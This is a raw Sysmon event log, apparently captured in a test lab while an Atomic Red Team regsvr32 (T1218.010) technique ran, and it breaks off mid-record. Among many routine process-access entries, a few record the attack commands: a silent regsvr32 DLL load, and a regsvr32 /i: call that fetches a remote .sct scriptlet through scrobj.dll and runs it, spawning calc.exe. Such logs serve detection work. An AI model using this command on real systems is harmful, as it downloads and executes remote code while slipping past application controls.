SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "IF "%%PROCESSOR_ARCHITECTURE%%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) ELSE ( C:\Windows\system32\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll )" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=9D59442313565C2E0860B88BF32B2277,SHA256=D0CEB18272966AB62B8EDFF100E9B4A6A3CB5DC0F2A32B2B18721FEA2D9C09A5,IMPHASH=272245E2988E1E430500B852C4FB5E18{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000360440Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-1100-000000001100}11166060C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360439Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 13241300x8000000000000000360438Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.968{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 11241100x8000000000000000360437Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.968{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-01-28 22:12:47.186 11241100x8000000000000000360436Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.968{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-01-28 22:12:47.186 13241300x8000000000000000360435Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.921{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\system32\cmd.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 13241300x8000000000000000360434Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.921{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\regsvr32.exeBinary Data 10341000x8000000000000000360433Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360432Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360431Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360430Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360429Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-3378-6013-6702-000000001100}29326308C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360428Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-36df-6013-9f03-000000001100}1020010756C:\Windows\system32\regsvr32.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\System32\windows.storage.dll+14c4a6|C:\Windows\System32\windows.storage.dll+14ccc3|C:\Windows\System32\windows.storage.dll+14c2e8|C:\Windows\System32\windows.storage.dll+14c113|C:\Windows\System32\windows.storage.dll+14be0d|C:\Windows\System32\windows.storage.dll+13d1d8|C:\Windows\System32\windows.storage.dll+14d6dd|C:\Windows\System32\windows.storage.dll+15bf79|C:\Windows\System32\SHELL32.dll+3ec1e|C:\Windows\System32\SHELL32.dll+41755|C:\Windows\System32\SHELL32.dll+c014e|C:\Windows\System32\shcore.dll+2dce5|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000360427Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.916{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe10.0.18362.1 (WinBuild.160101.0800)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXE"C:\Windows\System32\calc.exe" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=F88CC05134C555D4E1CD1DEF78162A9A,SHA256=A103A57D50B32469C5811E2808F021ADF9D9220093B540B8A9C83B5C821D370E,IMPHASH=8EEAA9499666119D13B3F44ECD77A729{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\System32\regsvr32.exeC:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll 10341000x8000000000000000360426Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000360425Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000360424Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000360423Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+2e3b5|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360422Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000360421Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+2bc7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360420Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+2bc7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360419Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+6164|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360418Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+6164|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360417Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+6153|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360416Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+6153|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360415Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+6142|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360414Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+6142|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360413Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.874{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 